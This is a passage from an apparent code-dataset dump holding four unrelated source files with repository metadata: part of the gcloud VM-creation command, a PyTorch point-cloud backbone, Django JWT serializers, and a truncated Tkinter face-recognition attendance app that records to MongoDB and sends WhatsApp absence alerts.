project_to_sa = {}\n for instance_ref in instance_refs:\n if instance_ref.project not in project_to_sa:\n scopes = None\n if not args.no_scopes and not args.scopes:\n # User didn't provide any input on scopes. If project has no default\n # service account then we want to create a VM with no scopes\n request = (client.apitools_client.projects,\n 'Get',\n client.messages.ComputeProjectsGetRequest(\n project=instance_ref.project))\n errors = []\n result = client.MakeRequests([request], errors)\n if not errors:\n if not result[0].defaultServiceAccount:\n scopes = []\n log.status.Print(\n 'There is no default service account for project {}. '\n 'Instance {} will not have scopes.'.format(\n instance_ref.project, instance_ref.Name))\n if scopes is None:\n scopes = [] if args.no_scopes else args.scopes\n\n if args.no_service_account:\n service_account = None\n else:\n service_account = args.service_account\n if (skip_defaults and not args.IsSpecified('scopes') and\n not args.IsSpecified('no_scopes') and\n not args.IsSpecified('service_account') and\n not args.IsSpecified('no_service_account')):\n service_accounts = []\n else:\n service_accounts = instance_utils.CreateServiceAccountMessages(\n messages=client.messages,\n scopes=scopes,\n service_account=service_account)\n project_to_sa[instance_ref.project] = service_accounts\n return project_to_sa\n\n def _GetImageUri(\n self, args, client, create_boot_disk, instance_refs, resource_parser):\n if create_boot_disk:\n image_expander = image_utils.ImageExpander(client, resource_parser)\n image_uri, _ = image_expander.ExpandImageFlag(\n user_project=instance_refs[0].project,\n image=args.image,\n image_family=args.image_family,\n image_project=args.image_project,\n return_image_resource=False)\n return image_uri\n\n def _GetNetworkInterfacesWithValidation(\n self, args, resource_parser, compute_client, holder, instance_refs,\n skip_defaults):\n if args.network_interface:\n return instance_utils.CreateNetworkInterfaceMessages(\n resources=resource_parser,\n compute_client=compute_client,\n network_interface_arg=args.network_interface,\n instance_refs=instance_refs)\n else:\n instances_flags.ValidatePublicPtrFlags(args)\n if self._support_public_dns:\n instances_flags.ValidatePublicDnsFlags(args)\n\n return self._GetNetworkInterfaces(\n args, compute_client, holder, instance_refs, skip_defaults)\n\n def _CreateRequests(\n self, args, instance_refs, compute_client, resource_parser, holder):\n # gcloud creates default values for some fields in Instance resource\n # when no value was specified on command line.\n # When --source-instance-template was specified, defaults are taken from\n # Instance Template and gcloud flags are used to override them - by default\n # fields should not be initialized.\n source_instance_template = self.GetSourceInstanceTemplate(\n args, resource_parser)\n skip_defaults = source_instance_template is not None\n\n source_machine_image = self.GetSourceMachineImage(\n args, resource_parser)\n skip_defaults = skip_defaults or source_machine_image is not None\n\n scheduling = instance_utils.GetScheduling(\n args, compute_client, skip_defaults, support_node_affinity=True,\n support_min_node_cpus=self._support_min_node_cpus)\n tags = instance_utils.GetTags(args, compute_client)\n labels = instance_utils.GetLabels(args, compute_client)\n metadata = instance_utils.GetMetadata(args, compute_client, skip_defaults)\n boot_disk_size_gb = instance_utils.GetBootDiskSizeGb(args)\n\n network_interfaces = self._GetNetworkInterfacesWithValidation(\n args, resource_parser, compute_client, holder, instance_refs,\n skip_defaults)\n\n machine_type_uris = instance_utils.GetMachineTypeUris(\n args, compute_client, holder, instance_refs, skip_defaults)\n\n create_boot_disk = not instance_utils.UseExistingBootDisk(args.disk or [])\n image_uri = self._GetImageUri(\n args, compute_client, create_boot_disk, instance_refs, resource_parser)\n\n shielded_instance_config = self._BuildShieldedInstanceConfigMessage(\n messages=compute_client.messages, args=args)\n\n # TODO(b/80138906): Release track should not be used like this.\n # These feature are only exposed in alpha/beta\n allow_rsa_encrypted = False\n if self.ReleaseTrack() in [base.ReleaseTrack.ALPHA, base.ReleaseTrack.BETA]:\n allow_rsa_encrypted = True\n\n csek_keys = csek_utils.CsekKeyStore.FromArgs(args, allow_rsa_encrypted)\n disks_messages = self._GetDiskMessages(\n args, skip_defaults, instance_refs, compute_client, resource_parser,\n create_boot_disk, boot_disk_size_gb, image_uri, csek_keys)\n\n project_to_sa = self._GetProjectToServiceAccountMap(\n args, instance_refs, compute_client, skip_defaults)\n\n requests = []\n for instance_ref, machine_type_uri, disks in zip(\n instance_refs, machine_type_uris, disks_messages):\n\n can_ip_forward = instance_utils.GetCanIpForward(args, skip_defaults)\n guest_accelerators = instance_utils.GetAccelerators(\n args, compute_client, resource_parser, instance_ref)\n\n instance = compute_client.messages.Instance(\n canIpForward=can_ip_forward,\n deletionProtection=args.deletion_protection,\n description=args.description,\n disks=disks,\n guestAccelerators=guest_accelerators,\n hostname=args.hostname,\n labels=labels,\n machineType=machine_type_uri,\n metadata=metadata,\n minCpuPlatform=args.min_cpu_platform,\n name=instance_ref.Name(),\n networkInterfaces=network_interfaces,\n serviceAccounts=project_to_sa[instance_ref.project],\n scheduling=scheduling,\n tags=tags)\n\n resource_policies = getattr(\n args, 'resource_policies', None)\n if resource_policies:\n parsed_resource_policies = []\n for policy in resource_policies:\n resource_policy_ref = maintenance_util.ParseResourcePolicyWithZone(\n resource_parser,\n policy,\n project=instance_ref.project,\n zone=instance_ref.zone)\n parsed_resource_policies.append(resource_policy_ref.SelfLink())\n instance.resourcePolicies = parsed_resource_policies\n\n if shielded_instance_config:\n instance.shieldedInstanceConfig = shielded_instance_config\n\n if self._support_erase_vss and \\\n args.IsSpecified('erase_windows_vss_signature'):\n instance.eraseWindowsVssSignature = args.erase_windows_vss_signature\n\n request = compute_client.messages.ComputeInstancesInsertRequest(\n instance=instance,\n project=instance_ref.project,\n zone=instance_ref.zone)\n\n if source_instance_template:\n request.sourceInstanceTemplate = source_instance_template\n\n if source_machine_image:\n request.instance.sourceMachineImage = source_machine_image\n if args.IsSpecified('source_machine_image_csek_key_file'):\n key = instance_utils.GetSourceMachineImageKey(\n args, self.SOURCE_MACHINE_IMAGE, compute_client, holder)\n request.instance.sourceMachineImageEncryptionKey = key\n\n if self._support_machine_image_key and \\\n args.IsSpecified('source_machine_image_csek_key_file'):\n if not args.IsSpecified('source_machine_image'):\n raise exceptions.RequiredArgumentException(\n '`--source-machine-image`',\n '`--source-machine-image-csek-key-file` requires '\n '`--source-machine-image` to be specified`')\n\n if args.IsSpecified('enable_display_device'):\n request.instance.displayDevice = compute_client.messages.DisplayDevice(\n enableDisplay=args.enable_display_device)\n\n if self._support_reservation:\n request.instance.reservationAffinity = instance_utils.GetReservationAffinity(\n args, compute_client)\n\n requests.append(\n (compute_client.apitools_client.instances, 'Insert', request))\n return requests\n\n def Run(self, args):\n instances_flags.ValidateDiskFlags(\n args, enable_kms=self._support_kms, enable_snapshots=True,\n enable_source_snapshot_csek=self._support_source_snapshot_csek,\n enable_image_csek=self._support_image_csek)\n instances_flags.ValidateImageFlags(args)\n instances_flags.ValidateLocalSsdFlags(args)\n instances_flags.ValidateNicFlags(args)\n instances_flags.ValidateServiceAccountAndScopeArgs(args)\n instances_flags.ValidateAcceleratorArgs(args)\n instances_flags.ValidateNetworkTierArgs(args)\n\n if self._support_reservation:\n instances_flags.ValidateReservationAffinityGroup(args)\n\n holder = base_classes.ComputeApiHolder(self.ReleaseTrack())\n compute_client = holder.client\n resource_parser = holder.resources\n\n instance_refs = instance_utils.GetInstanceRefs(args, compute_client, holder)\n\n requests = self._CreateRequests(\n args, instance_refs, compute_client, resource_parser, holder)\n if not args.async_:\n # TODO(b/63664449): Replace this with poller + progress tracker.\n try:\n # Using legacy MakeRequests (which also does polling) here until\n # replaced by api_lib.utils.waiter.\n return compute_client.MakeRequests(requests)\n except exceptions.ToolException as e:\n invalid_machine_type_message_regex = (\n r'Invalid value for field \\'resource.machineType\\': .+. '\n r'Machine type with name \\'.+\\' does not exist in zone \\'.+\\'\\.')\n if re.search(invalid_machine_type_message_regex, six.text_type(e)):\n raise exceptions.ToolException(\n six.text_type(e) +\n '\\nUse `gcloud compute machine-types list --zones` to see the '\n 'available machine types.')\n raise\n\n errors_to_collect = []\n responses = compute_client.BatchRequests(requests, errors_to_collect)\n for r in responses:\n err = getattr(r, 'error', None)\n if err:\n errors_to_collect.append(poller.OperationErrors(err.errors))\n if errors_to_collect:\n raise core_exceptions.MultiError(errors_to_collect)\n\n operation_refs = [holder.resources.Parse(r.selfLink) for r in responses]\n\n log.status.Print('NOTE: The users will be charged for public IPs when VMs '\n 'are created.')\n\n for instance_ref, operation_ref in zip(instance_refs, operation_refs):\n log.status.Print('Instance creation in progress for [{}]: {}'\n .format(instance_ref.instance, operation_ref.SelfLink()))\n log.status.Print('Use [gcloud compute operations describe URI] command '\n 'to check the status of the operation(s).')\n if not args.IsSpecified('format'):\n # For async output we need a separate format. Since we already printed in\n # the status messages information about operations there is nothing else\n # needs to be printed.\n args.format = 'disable'\n return responses\n\n\n@base.ReleaseTracks(base.ReleaseTrack.BETA)\nclass CreateBeta(Create):\n \"\"\"Create Google Compute Engine virtual machine instances.\"\"\"\n\n _support_kms = True\n _support_nvdimm = False\n _support_public_dns = False\n _support_reservation = True\n _support_disk_resource_policy = True\n _support_erase_vss = False\n _support_machine_image_key = False\n _support_min_node_cpus = False\n _support_source_snapshot_csek = False\n _support_image_csek = False\n\n def _GetNetworkInterfaces(\n self, args, client, holder, instance_refs, skip_defaults):\n return instance_utils.GetNetworkInterfaces(args, client, holder,\n instance_refs, skip_defaults)\n\n @classmethod\n def Args(cls, parser):\n _CommonArgs(\n parser,\n enable_regional=True,\n enable_kms=True,\n supports_reservation=cls._support_reservation,\n enable_resource_policy=cls._support_disk_resource_policy,\n )\n cls.SOURCE_INSTANCE_TEMPLATE = (\n instances_flags.MakeSourceInstanceTemplateArg())\n cls.SOURCE_INSTANCE_TEMPLATE.AddArgument(parser)\n instances_flags.AddLocalSsdArgs(parser)\n instances_flags.AddMinCpuPlatformArgs(parser, base.ReleaseTrack.BETA)\n\n\n@base.ReleaseTracks(base.ReleaseTrack.ALPHA)\nclass CreateAlpha(CreateBeta):\n \"\"\"Create Google Compute Engine virtual machine instances.\"\"\"\n\n _support_kms = True\n _support_nvdimm = True\n _support_public_dns = True\n _support_reservation = True\n _support_disk_resource_policy = True\n _support_erase_vss = True\n _support_machine_image_key = True\n _support_min_node_cpus = True\n _support_source_snapshot_csek = True\n _support_image_csek = True\n\n def _GetNetworkInterfaces(\n self, args, client, holder, instance_refs, skip_defaults):\n return instance_utils.GetNetworkInterfacesAlpha(\n args, client, holder, instance_refs, skip_defaults)\n\n def GetSourceMachineImage(self, args, resources):\n if not args.IsSpecified('source_machine_image'):\n return None\n ref = self.SOURCE_MACHINE_IMAGE.ResolveAsResource(args, resources)\n return ref.SelfLink()\n\n @classmethod\n def Args(cls, parser):\n _CommonArgs(\n parser,\n enable_regional=True,\n enable_kms=True,\n deprecate_maintenance_policy=True,\n supports_reservation=cls._support_reservation,\n enable_resource_policy=cls._support_disk_resource_policy,\n supports_min_node_cpus=cls._support_min_node_cpus,\n snapshot_csek=True,\n image_csek=True)\n CreateAlpha.SOURCE_INSTANCE_TEMPLATE = (\n instances_flags.MakeSourceInstanceTemplateArg())\n CreateAlpha.SOURCE_INSTANCE_TEMPLATE.AddArgument(parser)\n CreateAlpha.SOURCE_MACHINE_IMAGE = (\n instances_flags.AddMachineImageArg())\n CreateAlpha.SOURCE_MACHINE_IMAGE.AddArgument(parser)\n instances_flags.AddSourceMachineImageEncryptionKey(parser)\n instances_flags.AddMinCpuPlatformArgs(parser, base.ReleaseTrack.ALPHA)\n instances_flags.AddPublicDnsArgs(parser, instance=True)\n instances_flags.AddLocalSsdArgsWithSize(parser)\n instances_flags.AddLocalNvdimmArgs(parser)\n flags.AddEraseVssSignature(parser, 'source snapshots or source machine'\n ' image')\n maintenance_flags.AddResourcePoliciesArgs(parser, 'added to', 'instance')\n\nCreate.detailed_help = DETAILED_HELP\n","repo_name":"egzonarexhepi/mathpixlatexconverter","sub_path":"frontend/matt12345/google-cloud-sdk/.install/.backup/lib/surface/compute/instances/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":26243,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"35319023712","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\nimport copy\nimport pdb\n\n\nact_layer = nn.ReLU(inplace=True)\n\ndef conv3x3(in_planes, out_planes, stride=1, dilation=1, bias=False):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=dilation, dilation=dilation, bias=bias)\n\n\nclass DownSample2D(nn.Module):\n def __init__(self, in_planes, out_planes, stride=1):\n super(DownSample2D, self).__init__()\n self.conv_branch = nn.Sequential(\n conv3x3(in_planes, out_planes, stride=stride, dilation=1),\n nn.BatchNorm2d(out_planes)\n )\n\n self.pool_branch = nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, dilation=1, bias=False),\n nn.BatchNorm2d(out_planes),\n nn.MaxPool2d(kernel_size=3, stride=stride, padding=1, dilation=1)\n )\n\n self.act = act_layer\n \n def forward(self, x):\n x_conv = self.conv_branch(x)\n x_pool = self.pool_branch(x)\n x_out = self.act(x_conv + x_pool)\n return x_out\n\n\ndef get_module(param_dic, **kwargs):\n for key in param_dic:\n if (key != 'type') and param_dic[key] is not None:\n kwargs[key] = param_dic[key]\n \n result_module = eval(param_dic['type'])(**kwargs)\n return result_module\n\n\ndef gen_scene_feat(pc_feat, k=5):\n '''\n Input:\n pc_feat, (BS, C, N, 1)\n Output:\n scene_feat, (BS, C)\n '''\n pc_feat_topk = torch.topk(pc_feat.squeeze(-1), k=k, dim=2, largest=True, sorted=False)[0]\n scene_feat = pc_feat_topk.mean(dim=2)\n return scene_feat\n\n\nclass ChannelAtt(nn.Module):\n def __init__(self, channels, reduction=4):\n super(ChannelAtt, self).__init__()\n self.cnet = nn.Sequential(\n nn.AdaptiveAvgPool2d(output_size=1),\n nn.Conv2d(channels, channels // reduction, kernel_size=1, padding=0),\n act_layer,\n nn.Conv2d(channels // reduction, channels, kernel_size=1, padding=0),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n #channel wise\n ca_map = self.cnet(x)\n x = x * ca_map\n return x\n\n\nclass SpatialAtt(nn.Module):\n def __init__(self, channels, reduction=4):\n super(SpatialAtt, self).__init__()\n self.snet = nn.Sequential(\n conv3x3(channels, 4, stride=1, dilation=1),\n nn.BatchNorm2d(4),\n act_layer,\n conv3x3(4, 1, stride=1, dilation=1, bias=True),\n nn.Sigmoid()\n )\n \n def forward(self, x):\n #spatial wise\n sa_map = self.snet(x)\n x = x * sa_map\n return x\n\n\nclass CSAtt(nn.Module):\n def __init__(self, channels, reduction=4):\n super(CSAtt, self).__init__()\n self.channel_att = ChannelAtt(channels, reduction)\n self.spatial_att = SpatialAtt(channels, reduction)\n \n def forward(self, x):\n #channel wise\n x1 = self.channel_att(x)\n x2 = self.spatial_att(x1)\n return x2\n\n\nclass BasicBlock(nn.Module):\n def __init__(self, inplanes, reduction=1, dilation=1, use_att=True):\n super(BasicBlock, self).__init__()\n self.layer = nn.Sequential(\n conv3x3(in_planes=inplanes, out_planes=inplanes // reduction, stride=1, dilation=1),\n nn.BatchNorm2d(inplanes // reduction),\n act_layer,\n conv3x3(in_planes=inplanes // reduction, out_planes=inplanes, stride=1, dilation=dilation),\n nn.BatchNorm2d(inplanes)\n )\n\n self.use_att = use_att\n if self.use_att:\n self.channel_att = ChannelAtt(channels=inplanes, reduction=4)\n \n self.act = act_layer\n \n def forward(self, x):\n out = self.layer(x)\n if self.use_att:\n out = self.channel_att(out)\n \n out = self.act(out + x)\n return out\n\n\nclass BasicBlockv2(nn.Module):\n def __init__(self, inplanes, reduction=1, dilation=1, use_att=True):\n super(BasicBlockv2, self).__init__()\n self.conv1 = nn.Sequential(\n conv3x3(in_planes=inplanes, out_planes=inplanes // reduction, stride=1, dilation=1),\n nn.BatchNorm2d(inplanes // reduction),\n act_layer\n )\n\n self.conv2_0 = nn.Sequential(\n conv3x3(in_planes=inplanes // reduction, out_planes=inplanes // 2, stride=1, dilation=1),\n nn.BatchNorm2d(inplanes // 2)\n )\n self.conv2_1 = nn.Sequential(\n act_layer,\n conv3x3(in_planes=inplanes // 2, out_planes=inplanes // 2, stride=1, dilation=1),\n nn.BatchNorm2d(inplanes // 2)\n )\n\n self.use_att = use_att\n if self.use_att:\n self.channel_att = ChannelAtt(channels=inplanes, reduction=4)\n \n self.act = act_layer\n \n def forward(self, x):\n #pdb.set_trace()\n x1 = self.conv1(x)\n\n # multi-scale and attention fusion\n x2_0 = self.conv2_0(x1)\n x2_1 = self.conv2_1(x2_0)\n\n x2 = torch.cat((x2_0, x2_1), dim=1)\n if self.use_att:\n x2 = self.channel_att(x2)\n\n out = self.act(x2 + x)\n return out\n\n\nclass PredBranch(nn.Module):\n def __init__(self, cin, cout):\n super(PredBranch, self).__init__()\n self.pred_layer = nn.Sequential(nn.Conv2d(cin, cout, kernel_size=1, stride=1, padding=0, dilation=1))\n \n def forward(self, x):\n x1 = F.dropout(x, p=0.2, training=self.training, inplace=False)\n pred = self.pred_layer(x1)\n return pred\n\n\nclass PointNet(nn.Module):\n def __init__(self, cin, cout, pre_bn=False, post_act=True):\n super(PointNet, self).__init__()\n self.layer = None\n if pre_bn and post_act:\n self.layer = nn.Sequential(\n nn.BatchNorm2d(cin),\n nn.Conv2d(cin, cout, kernel_size=1, stride=1, padding=0, dilation=1, bias=False),\n nn.BatchNorm2d(cout),\n act_layer\n )\n elif (not pre_bn) and post_act:\n self.layer = nn.Sequential(\n nn.Conv2d(cin, cout, kernel_size=1, stride=1, padding=0, dilation=1, bias=False),\n nn.BatchNorm2d(cout),\n act_layer\n )\n elif pre_bn and (not post_act):\n self.layer = nn.Sequential(\n nn.BatchNorm2d(cin),\n nn.Conv2d(cin, cout, kernel_size=1, stride=1, padding=0, dilation=1, bias=False),\n nn.BatchNorm2d(cout)\n )\n elif (not pre_bn) and (not post_act):\n self.layer = nn.Sequential(\n nn.Conv2d(cin, cout, kernel_size=1, stride=1, padding=0, dilation=1, bias=False),\n nn.BatchNorm2d(cout)\n )\n \n def forward(self, x):\n x_feat = self.layer(x)\n return x_feat\n\n\nclass PointNetStacker(nn.Module):\n def __init__(self, cin, cout, pre_bn=False, post_act=True, stack_num=1):\n super(PointNetStacker, self).__init__()\n layers = None\n if stack_num == 1:\n layers = [PointNet(cin=cin, cout=cout, pre_bn=pre_bn, post_act=post_act)]\n else:\n layers = [PointNet(cin=cin, cout=cout, pre_bn=pre_bn, post_act=True)]\n for i in range(1, stack_num - 1):\n layers.append(PointNet(cin=cout, cout=cout, pre_bn=False, post_act=True))\n \n layers.append(PointNet(cin=cout, cout=cout, pre_bn=False, post_act=post_act))\n \n self.layer = nn.Sequential(*layers)\n \n def forward(self, x):\n x_feat = self.layer(x)\n return x_feat\n\n\nclass BranchAttFusion(nn.Module):\n def __init__(self, in_channel_list, out_channel):\n super(BranchAttFusion, self).__init__()\n self.in_channel_list = in_channel_list\n self.out_channel = out_channel\n\n assert len(self.in_channel_list) >= 2\n\n self.weights = nn.Parameter(torch.ones(len(self.in_channel_list), dtype=torch.float32), requires_grad=True)\n self.feat_model = nn.ModuleList()\n for i, in_channel in enumerate(self.in_channel_list):\n self.feat_model.append(PointNet(cin=in_channel, cout=out_channel, pre_bn=False))\n \n def forward(self, *x_list):\n #pdb.set_trace()\n weights = F.softmax(self.weights, dim=0)\n x_out = self.feat_model[0](x_list[0]) * weights[0]\n for i in range(1, len(x_list)):\n x_out = x_out + self.feat_model[i](x_list[i]) * weights[i]\n \n return x_out\n\n\nclass CatFusion(nn.Module):\n def __init__(self, in_channel_list, out_channel):\n super(CatFusion, self).__init__()\n self.in_channel_list = in_channel_list\n self.out_channel = out_channel\n\n assert len(self.in_channel_list) >= 2\n\n s = 0\n for in_channel in self.in_channel_list:\n s = s + in_channel\n \n c_mid = max(s // 2, out_channel)\n self.merge_layer = nn.Sequential(\n nn.Conv2d(s, c_mid, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(c_mid),\n act_layer,\n nn.Conv2d(c_mid, out_channel, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(out_channel),\n act_layer\n )\n \n def forward(self, *x_list):\n #pdb.set_trace()\n x_merge = torch.cat(x_list, dim=1)\n x_out = self.merge_layer(x_merge)\n return x_out\n\n\nclass PointAttFusion(nn.Module):\n def __init__(self, in_channel_list, out_channel):\n super(PointAttFusion, self).__init__()\n self.in_channel_list = in_channel_list\n self.out_channel = out_channel\n\n assert len(self.in_channel_list) >= 2\n\n self.att_layer = nn.Sequential(\n nn.Conv2d(len(self.in_channel_list) * out_channel, out_channel, kernel_size=1, padding=0, bias=False),\n nn.BatchNorm2d(out_channel),\n act_layer,\n nn.Conv2d(out_channel, len(self.in_channel_list), kernel_size=1, padding=0)\n )\n\n # make feature layer\n self.feat_model = nn.ModuleList()\n for i, in_channel in enumerate(self.in_channel_list):\n self.feat_model.append(PointNet(cin=in_channel, cout=out_channel, pre_bn=False))\n \n def forward(self, *x_list):\n #pdb.set_trace()\n batch_size = x_list[0].shape[0]\n\n x_feat_list = [self.feat_model[i](x_list[i]) for i in range(len(x_list))]\n\n x_merge = torch.stack(x_feat_list, dim=1) #(BS, S, channels, N, 1)\n\n ca_map = self.att_layer(x_merge.view(batch_size, len(self.in_channel_list)*self.out_channel, -1, 1))\n ca_map = ca_map.view(batch_size, len(self.in_channel_list), 1, -1, 1) #(BS, S, 1, N, 1)\n ca_map = F.softmax(ca_map, dim=1) #(BS, S, 1, N, 1)\n\n x_out = (x_merge * ca_map).sum(dim=1) #(BS, channels, N, 1)\n return x_out\n\n\nclass BilinearSample(nn.Module):\n def __init__(self, in_dim, scale_rate):\n super(BilinearSample, self).__init__()\n self.scale_rate = scale_rate\n \n def forward(self, grid_feat, grid_coord):\n '''\n Input:\n grid_feat, (BS, C, H, W)\n grid_coord, (BS, N, 2, S)\n Output:\n pc_feat, (BS, C, N, S)\n '''\n H = grid_feat.shape[2]\n W = grid_feat.shape[3]\n\n grid_sample_x = (2 * grid_coord[:, :, 1] * self.scale_rate[1] / (W - 1)) - 1 #(BS, N, S)\n grid_sample_y = (2 * grid_coord[:, :, 0] * self.scale_rate[0] / (H - 1)) - 1 #(BS, N, S)\n\n grid_sample_2 = torch.stack((grid_sample_x, grid_sample_y), dim=-1) #(BS, N, S, 2)\n pc_feat = F.grid_sample(grid_feat, grid_sample_2, mode='bilinear', padding_mode='zeros', align_corners=True) #(BS, C, N, S)\n return pc_feat","repo_name":"GangZhang842/CPGNet","sub_path":"networks/backbone.py","file_name":"backbone.py","file_ext":"py","file_size_in_byte":12050,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"31664529594","text":"from django.contrib.auth.models import update_last_login\nfrom rest_framework import serializers\nfrom rest_framework_simplejwt.serializers import RefreshToken, TokenObtainSerializer\nfrom rest_framework_simplejwt.settings import api_settings\n\n\nclass JWTTokenRefreshSerializer(serializers.Serializer):\n refresh_token = serializers.CharField()\n access_token = serializers.CharField(read_only=True)\n\n def validate(self, attrs):\n refresh = RefreshToken(attrs[\"refresh_token\"])\n data = {\n \"access_token\": str(refresh.access_token),\n \"refresh_token\": str(refresh),\n }\n return data\n\n\nclass JWTTokenObtainPairSerializer(TokenObtainSerializer):\n @classmethod\n def get_token(cls, user):\n return RefreshToken.for_user(user)\n\n def validate(self, attrs):\n data = super().validate(attrs)\n\n refresh = self.get_token(self.user)\n\n data.update(\n {\n \"access_token\": str(refresh.access_token),\n \"refresh_token\": str(refresh),\n }\n )\n\n if api_settings.UPDATE_LAST_LOGIN:\n update_last_login(None, self.user)\n return data\n","repo_name":"motivactions/reactionserver","sub_path":"auths/api/auth/jwt/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3612663524","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nimport face_recognition\r\nimport cv2\r\nimport numpy as np\r\nimport glob\r\nimport pickle\r\nimport pymongo \r\nimport pywhatkit as pwk\r\nimport webbrowser\r\n\r\nwindow=Tk()\r\n\r\n\r\n#take attendance\r\n\r\ndef tkat():\r\n \r\n #loading pickle files\r\n \r\n f=open(\"ref_name.pkl\",\"rb\")\r\n ref_dictt=pickle.load(f) \r\n f.close()\r\n f=open(\"ref_embed.pkl\",\"rb\")\r\n embed_dictt=pickle.load(f) \r\n f.close()\r\n \r\n #lists to store name and embeddings\r\n \r\n known_face_encodings = [] \r\n known_face_names = [] \r\n \r\n for ref_id , embed_list in embed_dictt.items():\r\n for my_embed in embed_list:\r\n known_face_encodings +=[my_embed]\r\n known_face_names += [ref_id]\r\n \r\n #capturing video with webcam\r\n \r\n video_capture = cv2.VideoCapture(0)\r\n face_locations = []\r\n face_encodings = []\r\n p_names = set()\r\n face_names = []\r\n process_this_frame = True\r\n \r\n while True :\r\n ret, frame = video_capture.read()\r\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\r\n rgb_small_frame = small_frame[:, :, ::-1]\r\n \r\n if process_this_frame:\r\n face_locations = face_recognition.face_locations(rgb_small_frame)\r\n face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\r\n face_names = []\r\n \r\n for face_encoding in face_encodings:\r\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding)\r\n name = \"Unknown\"\r\n face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)\r\n best_match_index = np.argmin(face_distances)\r\n \r\n if matches[best_match_index]:\r\n name = known_face_names[best_match_index]\r\n face_names.append(name)\r\n p_names.add(name)\r\n process_this_frame = not process_this_frame\r\n \r\n for (top_s, right, bottom, left), name in zip(face_locations, face_names):\r\n top_s *= 4\r\n right *= 4\r\n bottom *= 4\r\n left *= 4\r\n cv2.rectangle(frame, (left, top_s), (right, bottom), (0, 255, 0), 2)\r\n cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 255, 255), cv2.FILLED)\r\n font = cv2.FONT_HERSHEY_DUPLEX\r\n cv2.putText(frame, ref_dictt[name], (left + 6, bottom - 6), font, 1.0, (0, 0, 255), 1)\r\n font = cv2.FONT_HERSHEY_DUPLEX\r\n cv2.imshow('Video', frame)\r\n \r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n \r\n video_capture.release()\r\n cv2.destroyAllWindows()\r\n \r\n #preparing attendance list to update database\r\n \r\n global attendance_list\r\n attendance_list = []\r\n for present in p_names:\r\n attendance_list.append(present)\r\n \r\n #selecting and printing details of absent students\r\n \r\n global absent_list\r\n absent_list = list(ref_dictt.keys())\r\n \r\n for s_id in attendance_list:\r\n absent_list.remove(s_id)\r\n \r\n absl=str(absent_list)[1:-1]\r\n varabsent.set(absl)\r\n \r\n\r\n#give duty leave\r\n\r\ndef dl():\r\n\r\n #collecting data of students with duty leave\r\n \r\n exp_stu_id=varleave.get()\r\n dutyleave=list(map(str,exp_stu_id.split()))\r\n \r\n #updating attendance list to include students with duty leave\r\n \r\n for s_id in dutyleave:\r\n attendance_list.append(s_id)\r\n absent_list.remove(int(s_id))\r\n\r\n\r\n#mark attendance\r\n\r\ndef mkat():\r\n \r\n #connecting to mongodb\r\n \r\n myclient=pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\n mydb=myclient[\"attendance\"]\r\n mycol=mydb[\"student\"]\r\n \r\n #marking attendance in DB\r\n \r\n for s_id in attendance_list:\r\n st_id = int(s_id)\r\n mycol.update_many({\"_id\":st_id},{\"$set\" :{\"Status\":\"present\"}})\r\n \r\n for s_id in absent_list:\r\n st_id = int(s_id)\r\n mycol.update_many({\"_id\":st_id},{\"$set\" :{\"Status\":\"absent\"}})\r\n messagebox.showinfo(\"Updated\",\"Attendance Has Been Updated In Database\")\r\n\r\n\r\n#send alert message\r\n\r\ndef sndmsg():\r\n \r\n #connecting to mongodb\r\n \r\n myclient=pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\n mydb=myclient[\"attendance\"]\r\n mycol=mydb[\"student\"]\r\n cun=\"+91\"\r\n #fetching details from mongodb\r\n student=mycol.find({\"Status\":\"absent\"})\r\n \r\n for i in student:\r\n num=str(i[\"Phone\"])\r\n mob=cun+num\r\n #send message to one person\r\n msg=\"Your Child \"+i[\"Name\"]+\" is absent in class\"\r\n pwk.sendwhatmsg_instantly(mob, msg)\r\n \r\n messagebox.showinfo(\"Done\",\"Message Has Been Send To Parents\")\r\n\r\n\r\n#help website\r\n\r\ndef helpopen():\r\n webbrowser.open('https://vellathottam.github.io')\r\n\r\n\r\n#about website\r\n\r\ndef aboutopen():\r\n webbrowser.open('https://vellathottam.github.io')\r\n\r\n\r\n#menubar and menu options\r\n\r\nmenubar=Menu(window)\r\n\r\nsubmenu = Menu(menubar, tearoff =0)\r\nsubmenu.add_command(label = 'Record Attendance', command = tkat)\r\nsubmenu.add_command(label = 'Mark Attendance', command = mkat)\r\n\r\nattendance = Menu(menubar, tearoff = 0)\r\nmenubar.add_cascade(label = 'Attendance', menu = attendance)\r\nattendance.add_cascade(label = 'Take Attendance', menu = submenu)\r\nattendance.add_command(label = 'View Attendance')\r\n\r\nalert = Menu(menubar, tearoff = 0)\r\nmenubar.add_cascade(label = 'Alert', menu = alert)\r\nalert.add_command(label = 'Send Alert', command = sndmsg)\r\n\r\nhelp = Menu(menubar, tearoff = 0)\r\nmenubar.add_cascade(label = 'Help', menu = help)\r\nhelp.add_command(label = 'Get Help', command = helpopen)\r\nhelp.add_separator()\r\nhelp.add_command(label = 'About ROI', command = aboutopen)\r\n\r\n\r\n#entry and labels\r\n\r\nvarstaffid = StringVar()\r\nlabel_a=Label(window, text='Staff ID', font=\"Cambria\")\r\nlabel_a.place(x=100, y=199)\r\nstaffid=Entry(window, bg='white', fg='black', bd=1, font='Cambria', textvariable=varstaffid)\r\nstaffid.place(x=200, y=200)\r\n\r\n\r\nvarperiod = 